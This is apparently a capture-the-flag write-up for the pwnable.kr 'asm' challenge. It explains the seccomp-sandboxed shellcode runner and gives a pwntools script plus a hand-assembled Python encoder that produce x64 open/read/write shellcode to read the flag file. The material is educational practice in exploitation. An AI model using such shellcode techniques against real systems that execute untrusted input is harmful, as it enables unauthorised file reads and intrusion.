This looks like a shellcode challenge.
Connect and take a look.

There seems to be a readme in the home directory; let's read it.

Roughly: connect to port 9026, where the asm binary is run with elevated privileges, and get the flag.

Let's look at asm.c first.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
	scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
	if (ctx == NULL) {
		printf("seccomp error\n");
		exit(0);
	}

	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

	if (seccomp_load(ctx) < 0){
		seccomp_release(ctx);
		printf("seccomp error\n");
		exit(0);
	}
	seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];

int main(int argc, char* argv[]){

	setvbuf(stdout, 0, _IONBF, 0);
	setvbuf(stdin, 0, _IOLBF, 0);

	printf("Welcome to shellcoding practice challenge.\n");
	printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
	printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
	printf("If this does not challenge you. you should play 'asg' challenge :)\n");

	char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
	memset(sh, 0x90, 0x1000);
	memcpy(sh, stub, strlen(stub));

	int offset = sizeof(stub);
	printf("give me your x64 shellcode: ");
	read(0, sh+offset, 1000);

	alarm(10);
	chroot("/home/asm_pwn");	// you are in chroot jail. so you can't use symlink in /tmp
	sandbox();
	((void (*)(void))sh)();
	return 0;
}

Let's walk through the program.

1. Set stdio buffering, print the banner, then mmap() a 0x1000-byte page at the fixed address 0x41414000 with prot 7 (PROT_READ|PROT_WRITE|PROT_EXEC), fill it with 0x90 NOPs and copy stub to its start. The banner tells us what to do:
   In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
   Try to make shellcode that spits flag using open()/read()/write() systemcalls only.

	setvbuf(stdout, 0, _IONBF, 0);
	setvbuf(stdin, 0, _IOLBF, 0);
	printf("Welcome to shellcoding practice challenge.\n");
	printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
	printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
	printf("If this does not challenge you. you should play 'asg' challenge :)\n");
	char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
	memset(sh, 0x90, 0x1000);
	memcpy(sh, stub, strlen(stub));

2. Read up to 1000 bytes of our shellcode into the page right behind stub, arm a 10-second alarm, chroot() into /home/asm_pwn (so a symlink in /tmp is of no use), install the seccomp filter, and call the page as a function. sandbox() starts from a default action of SCMP_ACT_KILL and allows only open, read, write, exit and exit_group. The filter matches on raw x86-64 syscall numbers, so anything else (openat, mmap, execve, ...) kills the process on the spot; in particular the shellcode has to use open (syscall 2), not the openat that compilers and libc normally emit.

	int offset = sizeof(stub);
	printf("give me your x64 shellcode: ");
	read(0, sh+offset, 1000);
	alarm(10);
	chroot("/home/asm_pwn");	// you are in chroot jail. so you can't use symlink in /tmp
	sandbox();
	((void (*)(void))sh)();
	return 0;

Let's see what the shellcode in stub does, using pwntools to disassemble it. One thing to watch: disasm() decodes for context.arch, which defaults to i386, so without context.arch = 'amd64' every 0x48/0x4d REX prefix shows up as a bogus dec eax / dec ebp and the registers come out as 32-bit. With the architecture set correctly:

Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.arch = 'amd64'
>>> print disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff")
   0:   48 31 c0                xor    rax, rax
   3:   48 31 db                xor    rbx, rbx
   6:   48 31 c9                xor    rcx, rcx
   9:   48 31 d2                xor    rdx, rdx
   c:   48 31 f6                xor    rsi, rsi
   f:   48 31 ff                xor    rdi, rdi
  12:   48 31 ed                xor    rbp, rbp
  15:   4d 31 c0                xor    r8, r8
  18:   4d 31 c9                xor    r9, r9
  1b:   4d 31 d2                xor    r10, r10
  1e:   4d 31 db                xor    r11, r11
  21:   4d 31 e4                xor    r12, r12
  24:   4d 31 ed                xor    r13, r13
  27:   4d 31 f6                xor    r14, r14
  2a:   4d 31 ff                xor    r15, r15

So the stub does nothing beyond zeroing every general-purpose register except rsp: rax, rbx, rcx, rdx, rsi, rdi, rbp and r8 to r15. rsp is deliberately left alone, so the stack is still usable, which is what lets our shellcode push the filename and use rsp as a buffer. Note also that sizeof(stub) counts the terminating NUL while memcpy() copies only strlen(stub) bytes, so between the stub and our input there is one leftover 0x90 from the memset(); execution simply falls through it.

Since only read, open, write, exit and exit_group are allowed, and those are all we need to open the flag file, read it and print it, we write the shellcode with pwntools' shellcraft:

from pwn import *

context(arch='amd64', os='linux', log_level='info')

# ssh into pwnable.kr, then connect to the asm service from inside the box
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
r = con.connect_remote('localhost', 9026)

shellcode = ''
# push the (very long) flag filename onto the stack; rsp then points at it
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
# open(rsp, 0, 0): the filename is at rsp, O_RDONLY is 0
shellcode += shellcraft.open('rsp')
# read(fd, rsp, 100): rax holds the fd returned by open(); reuse the stack as the buffer
shellcode += shellcraft.read('rax', 'rsp', 100)
# write(1, rsp, 100): on Linux fd 0 is stdin, 1 stdout, 2 stderr, so this dumps the buffer to stdout
shellcode += shellcraft.write(1, 'rsp', 100)
# exit(0) is on the allow-list too; exit cleanly instead of running off into the NOP sled
shellcode += shellcraft.exit(0)

# tube I/O: http://docs.pwntools.com/en/stable/tubes.html
r.recvuntil('give me your x64 shellcode: ')
r.sendline(asm(shellcode))
# print whatever comes back
print(r.recvall())
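The same open/read/write/exit sequence, assembled by hand in Python 3 without pwntools, as an added example (not code from the original writeup). It shows what shellcraft hides: the syscall numbers that the seccomp allow-list in asm.c compares against, the register each argument goes in, and how pushstr() lays the filename out so that rsp points at it. The register constants, the X64 emitter class and passes_sandbox() are this example's own names; the byte encodings differ from what pwntools' asm() picks (it prefers shorter forms), but the behaviour is the same, and the output can be fed to the service in place of asm(shellcode).

```python
"""Hand-assembled x64 shellcode for the asm challenge: open/read/write/exit only.

Added example (not from the original writeup). It builds the same syscall
sequence as the shellcraft-based script, but encodes every instruction by
hand so the syscall numbers, argument registers and pushstr() stack layout
are explicit. Python 3; no pwntools needed.
"""
import struct

# x86-64 register numbers as used in ModRM / opcode+reg encodings.
RAX, RCX, RDX, RBX, RSP, RBP, RSI, RDI = range(8)

# x86-64 syscall numbers (arch/x86/entry/syscalls/syscall_64.tbl).
SYS_READ, SYS_WRITE, SYS_OPEN, SYS_EXIT, SYS_EXIT_GROUP = 0, 1, 2, 60, 231
# Exactly what sandbox() in asm.c allows; everything else is SCMP_ACT_KILL.
# openat (257) is not in the list, so the shellcode must use open (2).
ALLOWED = {SYS_OPEN, SYS_READ, SYS_WRITE, SYS_EXIT, SYS_EXIT_GROUP}

# The challenge's flag filename, as given in the writeup.
FLAG_NAME = b"this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"


class X64:
    """Minimal emitter for the few encodings this shellcode needs."""

    def __init__(self):
        self.code = bytearray()
        self.syscalls = []          # syscall numbers issued, for the filter check

    def mov_rax_imm64(self, v):     # 48 b8 imm64
        self.code += b"\x48\xb8" + struct.pack("<Q", v)

    def push_rax(self):             # 50
        self.code += b"\x50"

    def mov_r32_imm32(self, reg, v):   # b8+r imm32; writing e?x zero-extends into r?x
        self.code += bytes([0xB8 + reg]) + struct.pack("<I", v)

    def xor_r32(self, reg):         # 31 /r ; xor r32, r32 clears the whole 64-bit reg
        self.code += bytes([0x31, 0xC0 | (reg << 3) | reg])

    def mov_r64_r64(self, dst, src):   # 48 89 /r ; mov r/m64, r64
        self.code += bytes([0x48, 0x89, 0xC0 | (src << 3) | dst])

    def syscall(self, nr):
        """mov eax, nr ; syscall (and record nr for passes_sandbox)."""
        self.mov_r32_imm32(RAX, nr)
        self.code += b"\x0f\x05"
        self.syscalls.append(nr)

    def pushstr(self, s):
        """What shellcraft.pushstr does: NUL-terminate, pad to a multiple of 8,
        push the qwords last-first so the string starts exactly at rsp."""
        s += b"\x00"
        s += b"\x00" * (-len(s) % 8)
        for i in range(len(s) - 8, -1, -8):
            self.mov_rax_imm64(struct.unpack("<Q", s[i:i + 8])[0])
            self.push_rax()


def build_shellcode(filename=FLAG_NAME, bufsize=100):
    """Return (code_bytes, syscall_numbers_used)."""
    a = X64()
    a.pushstr(filename)             # rsp -> "this_is_pwnable.kr_flag_file_..."
    # open(rsp, O_RDONLY=0, 0)
    a.mov_r64_r64(RDI, RSP)
    a.xor_r32(RSI)
    a.xor_r32(RDX)
    a.syscall(SYS_OPEN)
    # read(fd=rax, rsp, bufsize): the filename buffer on the stack is reused
    a.mov_r64_r64(RDI, RAX)
    a.mov_r64_r64(RSI, RSP)
    a.mov_r32_imm32(RDX, bufsize)
    a.syscall(SYS_READ)
    # write(1, rsp, rax): write only as many bytes as read() returned
    a.mov_r64_r64(RDX, RAX)
    a.mov_r32_imm32(RDI, 1)
    a.mov_r64_r64(RSI, RSP)
    a.syscall(SYS_WRITE)
    # exit(0): allowed by the filter; avoids running off into the NOP sled
    a.xor_r32(RDI)
    a.syscall(SYS_EXIT)
    return bytes(a.code), a.syscalls


def passes_sandbox(syscalls, allowed=ALLOWED):
    """True if every syscall the shellcode issues would get past sandbox()."""
    return all(nr in allowed for nr in syscalls)


if __name__ == "__main__":
    import sys
    code, used = build_shellcode()
    if not passes_sandbox(used):
        sys.exit("a syscall outside the allow-list would be SIGSYS-killed")
    if len(code) > 1000:
        sys.exit("asm.c reads at most 1000 bytes after the stub")
    sys.stderr.write("%d bytes, syscalls %s\n" % (len(code), used))
    sys.stdout.buffer.write(code)   # pipe this to the service on port 9026
```

passes_sandbox() is a static check on what the emitter recorded, not a BPF evaluation, but for straight-line shellcode like this it answers the question that matters before sending anything: does every `mov eax, N ; syscall` use a number the filter lets through.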

Run it and we get the flag.
